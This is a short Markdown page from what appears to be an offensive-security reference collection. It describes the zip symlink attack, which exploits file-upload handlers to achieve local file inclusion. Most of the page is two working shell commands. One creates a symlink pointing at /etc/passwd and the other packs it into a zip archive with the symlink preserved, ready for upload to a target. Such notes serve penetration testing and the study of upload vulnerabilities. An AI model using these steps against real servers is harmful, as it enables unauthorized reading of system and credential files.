killchain-compendium/Exploits/Compression/Zip Symlink.md

17 lines
334 B
Markdown

# Zip Symlink
https://effortlesssecurity.in/zip-symlink-vulnerability/
The exploit is a method of using LFI through an uploaded symlink compressed inside a zip file.
Create a symlink and put it in a zip file.
```sh
ln -s /etc/passwd link.name
```
compress it leaving symlinks intact
```sh
zip -r --symlinks mal.zip link.name
```